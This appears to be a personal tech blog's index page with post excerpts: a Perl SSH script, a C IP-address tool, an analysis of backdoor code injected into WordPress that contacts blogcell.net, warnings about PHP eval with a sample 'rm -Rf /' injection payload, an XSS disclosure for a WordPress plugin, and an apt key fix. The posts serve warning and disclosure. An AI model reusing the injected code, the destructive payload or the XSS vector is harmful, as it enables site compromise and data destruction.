Markizano.NET

In my experiences, code has sometimes been better at explaining than documentation. Why did I do this? Because I didn't find it immediately when I searched for it... Cheers! Copy From PasteBin! #!/usr/bin/perl use strict; use warnings; use Data::Dumper; use Net::SSH2; use Net::SFTP; use Carp; use Fcntl; use Fcntl ':DEFAULT'; use constant SSH_USER => 'root'; use constant SSH_PASS => 'toor'; use constant SSH_HOST => 'localhost'; use constant SSH_PORT => 21; my ( $conn, $ssh, $sftp, $buf, $buffer, $len ); sub ssh_connect { my ( $ssh, $user, $host, $pass, $port ); ( $user, $pass, $host, $port ) = @_; $host ||= 'localhost'; $port ||= 22; $ssh = new Net::SSH2; $ssh->debug(1); $ssh->blocking(1); return 0 unless $ssh->connect($host . ':' . $port); print "[*] Connect OK!\n"; return 0 unless $ssh->auth( username => $user, password => $pass); print "[*] Auth OK!\n"; return $ssh; } sub...

So, here I am searching the internet over and over again to find out how to easily and quickly get the ip address of a local interface, and there isn't an easy way to do it without running `ifconfig | grep | cut...` in some crazy fashion. So, here I've compiled a simple C script that will iterate through your interfaces and get the IP address of a local network interface if you supply it on the command line. Feel free to redistribute under GNU. https://github.com/markizano/scripts/blob/master/getifaddr/getifaddr.c /* This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Gene...

Malicious crackers don't care who you are. They prey and feed on the fact that you think you're so meaningless that you'll never be targeted. I came across this one exploit that was really interesting. Someone went to some great lengths to get this poor victim. Code: function wp_get_footer_meta() { global $wpdb; if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name='adwb_opt'")) $adwb_opt = unserialize($adwb_opt); else { $adwb_opt = array( 0, '' ); $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('adwb_opt', '" . serialize($adwb_opt) . "', 'no')"); } if ((time() - $adwb_opt[0]) >= 3600) { $adwb_host = 'blogcell.net'; $adwb_get = '/wpam/'; $adwb_soc = @fsockopen($adwb_host, 80, $_en, $_es, 30); ...

Why? Because Kizano said so... Here are some examples I've seen in live code that just do not work (1-line each): $success = eval('?>' . $_GET['a']); eval("$my_obj->$key = $other_obj->$some_value"); I'm really surprised at some people. Do they not see the glaring a=<?php system("rm -Rf /"); in their URL ? Just keep things easy on yourself and use this instead: $success = (string)$_GET['a']; $my_obj->$key = $other_obj->$some_value; That way - you don't give me a heart attack when I see you vulnerable to the most basic PHP exploit... Remember, PHP is smart enough to do what you what, but the real question is are you l33t enough to write it? Eval is Evil! EOF

http://wordpress.org/extend/plugins/securepress-plugin/ While looking around in a Wordpress install, I found this little gem: line 2218: $back = isset($_POST['back']) ? $_POST['back'] : null; Line 2349: <input type="button" value="Cancel" onclick="eval(\'memos.\'+\''.addcslashes($back,"'").'\')" /> $back is never properly escaped for JS... They should use json_encode instead. I can inject arbitrary JavaScript into a post request for the "back" parameter and have it come out in your browser. Tested on plugin version 8.4.01. -0xKizano

So, you added a new thing to your /etc/apt/sources.list (or if you're smarter than most, you'll create your own user-based file in /etc/apt/sources.list.d/<new-source>.list , then you go to update Aptitude, and you get the following message: root@localhost:~# apt-get update ... W: GPG error: http://updates.repository.backtrack-linux.org revolution Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY AB6DA34B475A6B7F This is all fine and dandy - I can just goto the site and look for their key and install that, right? No? They don't just give me the key?! Then your packages will always be unverified and I'll be open to an exploit that allows the install of arbitrary third-party packages! Oh noes! D: Whatever shall we do? Never fear - there's a way to get that key and turn it into something apt-get can use and stop complaining about that error. Checkout apt-get-key , which is a quick script that ...

Here's the view I get from my office window: I love my job :3